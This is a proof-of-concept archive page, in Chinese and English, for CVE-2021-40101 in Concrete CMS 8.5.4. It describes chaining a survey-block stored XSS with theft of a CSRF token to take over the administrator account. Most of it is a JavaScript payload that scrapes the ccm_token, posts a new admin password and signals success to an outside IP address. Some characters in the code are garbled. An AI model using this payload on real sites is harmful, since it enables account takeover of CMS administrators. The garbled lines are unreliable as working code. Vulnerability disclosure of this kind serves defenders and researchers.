POC详情: df85c77d4bb1f5ad40d642e54d4d6189243e81f8

来源
https://github.com/S1lkys/CVE-2021-40101
关联漏洞
标题: PortlandLabs Concrete CMS 安全漏洞 (CVE-2021-40101)
描述:PortlandLabs Concrete Cms是美国PortlandLabs公司的一个面向团队的开源内容管理系统。 PortlandLabs Concrete CMS 中存在安全漏洞,该漏洞源于产品允许在不提示输入当前密码情况下修改密码。以下产品及版本受到影响:Concrete CMS 8.5.7 之前版本。
描述
Survey XSS combined with CSRF leads to Admin Account Takeover in Concrete5 8.5.4
介绍
# Survey XSS combined with CSRF leads to Admin Account Takeover in Concrete5 8.5.4
A Concrete CMS admin in versions below 9 did not have to provide their password when changing another user's password.

In combination with [CVE-2021-28145](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28145) ("Concrete CMS (formerly concrete5) before 8.5.5 allows remote authenticated users to conduct XSS attacks via a crafted survey block. This requires at least Editor privileges": fix was included in version 8.5.5.) it is possible for a low privileged User for example a developer or a public user who is able to create surveys to insert malicious javascript code into the web application. The results of surveys can be reviewd by an administrator in his web interface under Reports > Surveys. The malicious Javascript code gets there executed as well. Concrete5 does have a CSRF protection which can be bypassed very easily by stealing the corresponding Token from the Page before executing a request. As concrete5 does not ask for the old password when changing it. It is possible to change the administrator password very easily.


# Payload
```
var ccm_token = ";
var body = ";
var regex = /[0-9]{10}\:[a-f0-9]{32}/g;
var req = new XMLHttpRequest();
var req2 = new XMLHttpRequest(); 
req.open("GET","/concrete5-8.5.4/index.php/dashboard/users/search/view/1", true); 
req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req. send(); 

req.onreadystatechange = function () { 
  if (req.readyState == 4 bb req.status == 200) { 
    body = req.responseText; 
    ccm_token = body.match(regex)[3];
   }
  }; 
setTimeout(() => { 
  confirm("Admin Account Takeover through XSS and CSRF Bypass in Concrete5 v.8.5.4 by Silky. CSRF Tok en: "+ccm_token); 
  req2.open("POST","/concrete5-8.5.4/index.php/dashboard/users/search/change_password/1", true);
  req2.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  req2.setRequestHeader('Content-type', eapplication/x-www-form-urlencoded.);
  req2.send("ccm_token="+ccm_token+"&uPassword=Demonstration_by_SilkyEruPasswordConfirm=Demonstration_ by_Silkyt_ccm_consider_request_as_xhr=1"); 

req2.onreadystatechange = function () { 
  if (req2.readyState == 4 bb req2.status == 200) {
    body = req2.responseText;
    if (body.includes("Password updated successfully.")){
      console.log("Password updated successfully.");
      var myImage = new Image(0, 0);
      myImage.src = Ihttp://192.168.56.1:5686/Password_changed_successfullys;
     }
     else{
      console.log("Something went wrong");
     } 
   }
 } 
},2000); 

```




CVSS scores: 
* CVE-2021-40101 - 6.4 medium AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
* CVE-2021-28145 - 5.4 medium CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Resulting in a final score of 
* 7.2 high

# References:
* https://hackerone.com/bugs?report_id=1065577
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40101
* https://youtu.be/w-B-j4NadDw
* https://github.com/concrete5/concrete5/pull/9707/commits/f6bb806acfdda22860133b9586df068d4e3909a7
文件快照

 [4.0K]  /data/pocs/df85c77d4bb1f5ad40d642e54d4d6189243e81f8
└── [3.0K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。